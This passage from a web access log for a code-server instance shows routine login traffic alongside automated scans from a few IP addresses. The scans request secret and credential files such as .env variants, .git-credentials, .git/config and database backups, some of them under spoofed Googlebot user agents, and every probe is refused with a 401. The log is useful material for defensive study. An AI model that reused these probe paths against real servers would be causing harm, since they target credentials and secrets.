+[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/helm/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/secret.yaml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.override.yaml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-04" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/COMMIT_EDITMSG" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.13" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/~/.git-credentials" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/logs/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/v3/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/stash" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public/js/bundle.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/pages/index.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/codefresh.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/database.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/config.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/test.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/version.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/hooks/post-update" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/bundle.js.map" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/logs/HEAD" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wercker.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.gitmodules" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/database.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/service-worker.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/runtime-main.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/remix.config.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 216.81.248.13] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "https://code.profibot.hu/" +[20/Jan/2026:00:36:35 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 104.252.191.136] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:36:35 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 103.196.9.92] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:36:40 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 104.252.191.136] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:36:40 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 103.196.9.92] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:36:54 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 103.196.9.92] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:36:55 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 103.196.9.92] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:38:23 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.170] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[20/Jan/2026:00:38:23 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.170] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[20/Jan/2026:00:54:44 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.254.106.197] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:44 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.254.106.197] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[20/Jan/2026:00:54:44 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.254.106.197] [Length 4231] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:44 +0000] - 401 401 - GET https code.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:44 +0000] - 401 401 - GET https code.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:44 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.254.106.197] [Length 804] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:44 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 84.254.106.197] [Length 8489] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:45 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.254.106.197] [Length 464] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:45 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.254.106.197] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:45 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.254.106.197] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:45 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.254.106.197] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:00:54:45 +0000] - 401 401 - GET https code.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:01:02:05 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 54.191.192.72] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:01:02:05 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 54.191.192.72] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582" "-" +[20/Jan/2026:01:02:05 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 54.191.192.72] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1" "http://code.profibot.hu" +[20/Jan/2026:01:02:05 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 54.191.192.72] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582" "http://code.profibot.hu" +[20/Jan/2026:01:21:01 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 18.236.77.248] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "-" +[20/Jan/2026:01:21:01 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 18.236.77.248] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:01 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 18.236.77.248] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:02 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 18.236.77.248] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:02 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 18.236.77.248] [Length 4219] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:02 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 18.236.77.248] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:02 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 18.236.77.248] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:04 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 18.236.77.248] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:01:21:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 18.236.77.248] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 18.236.77.248] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:05 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 18.236.77.248] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 18.236.77.248] [Length 4213] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 18.236.77.248] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/login" +[20/Jan/2026:01:21:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 18.236.77.248] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/login" +[20/Jan/2026:01:23:57 +0000] - 200 200 - GET https code.profibot.hu "/robots.txt" [Client 216.73.216.109] [Length 26] [Gzip -] [Sent-to code-server] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[20/Jan/2026:01:35:47 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.115] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" +[20/Jan/2026:01:35:47 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.115] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" +[20/Jan/2026:01:35:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 23.27.145.115] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:01:35:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 23.27.145.115] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:01:56:09 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 104.154.91.166] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36" "-" +[20/Jan/2026:01:56:09 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 104.154.91.166] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36" "-" +[20/Jan/2026:02:21:07 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 52.16.245.145] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" +[20/Jan/2026:02:21:07 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 52.16.245.145] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" +[20/Jan/2026:02:21:08 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 52.16.245.145] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 52.16.245.145] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 52.16.245.145] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 52.16.245.145] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 52.16.245.145] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 52.16.245.145] [Length 4213] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 52.16.245.145] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 52.16.245.145] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 52.16.245.145] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" +[20/Jan/2026:02:21:08 +0000] - 401 401 - HEAD https code.profibot.hu "/favicon.ico" [Client 52.16.245.145] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" +[20/Jan/2026:02:21:08 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 52.16.245.145] [Length 4219] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/static/js/bundle.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/main.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/js/app.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/app.js.map" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/keys.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/bundle.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/__env.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/index.js.map" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/chunk.js.map" [Client 216.81.248.16] [Length 655] [Gzip 